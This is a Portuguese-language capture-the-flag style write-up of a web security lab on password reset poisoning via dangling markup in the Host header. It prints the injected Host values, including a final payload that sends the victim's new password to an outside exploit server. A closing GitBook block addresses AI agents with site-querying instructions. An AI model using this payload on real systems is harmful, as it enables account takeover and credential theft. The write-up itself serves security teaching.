> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/pt-br/web/host-header/password-reset-poisoning-via-dangling-markup.md).

# Envenenamento da Redefinição de Senha via Marcação Pendente

### Envenenamento de redefinição de senha via markup pendente

**Descrição do laboratório**

Este laboratório é vulnerável a um **envenenamento de redefinição de senha via markup pendente**. / Ao usar o gerenciamento HTML incorreto no e-mail de redefinição, é possível desviar o link enviado a um usuário e recuperar sua nova senha.

**Objetivo:** fazer login em **conta do Carlos**.

**Credenciais fornecidas:**

* Usuário: `wiener`
* Senha: `peter`

<figure><img src="/files/a1d67f855f79ff8b747507f4b209cd0039702953" alt=""><figcaption></figcaption></figure>

Todos os e-mails podem ser visualizados por meio do cliente de e-mail do servidor em execução\*\*.

<figure><img src="/files/bea1ff6b340078ee3d4aed2d905acb13e0e239c1" alt=""><figcaption></figcaption></figure>

**Observação inicial**

Um recurso de redefinição de senha está disponível. / Após a solicitação, um e-mail HTML é enviado com o seguinte conteúdo:

{% code overflow="wrap" %}

```http
<p>Olá!</p><p>Por favor, <a href='https://0a2e00ee040867fe812cd4f900e700cb.web-security-academy.net/login'>clique aqui</a> para fazer login com sua nova senha: AGSoZyzfot</p><p>Obrigado,<br/>Equipe de suporte</p><i>Este e-mail foi verificado pelo serviço de segurança de e-mail MacCarthy</i>
```

{% endcode %}

O link de conexão é construído dinamicamente a partir do **Host** cabeçalho da requisição.

**Análise comportamental**

Se você alterar o cabeçalho Host para incluir uma porta arbitrária:

```http
Host: 0a2e00ee040867fe812cd4f900e700cb.web-security-academy.net:1234
```

A porta é refletida corretamente no e-mail recebido. / Isso confirma que o valor de **Host** é incorporado sem validação rigorosa no HTML do e-mail.

<figure><img src="/files/cab0284f3110065583b8ca4f3c34d9ace9a41ff1" alt=""><figcaption></figcaption></figure>

**Exploração via markup pendente**

Em seguida, um valor de Host contendo um apóstrofo é injetado, quebrando assim o atributo HTML:

```http
Host: 0a2e00ee040867fe812cd4f900e700cb.web-security-academy.net:1234'HELLOO
```

O conteúdo é interpretado pelo cliente de e-mail, o que indica uma injeção HTML utilizável.

<figure><img src="/files/03bbec25336e4318ddde2a75373d10498e433a5d" alt=""><figcaption></figcaption></figure>

**Carga útil final**

Esse comportamento é explorado ao abrir uma `<a href>` tag sem fechá-la corretamente, para que o restante do conteúdo do e-mail (incluindo a senha) seja interpretado como parte da URL:

```http
Host: 0a2e00ee040867fe812cd4f900e700cb.web-security-academy.net:1234' <a href="https://exploit-0aae00f3041e67018152d3fe010000c3.exploit-server.net/?
```

<figure><img src="/files/4ba58603e838596683c00dc1458144f913642eae" alt=""><figcaption></figcaption></figure>

**Resultado**

Quando o e-mail é gerado e enviado para **carlos**, o cliente de e-mail interpreta o HTML injetado. / A nova senha é então incluída na URL e transmitida automaticamente para o servidor em operação **servidor**.

A senha de Carlos é recuperada dos logs do servidor, o que permite que você faça login na conta dele e valide o laboratório.

<figure><img src="/files/179ac8c723a249bd7215291afdfcdd906942a95a" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/pt-br/web/host-header/password-reset-poisoning-via-dangling-markup.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
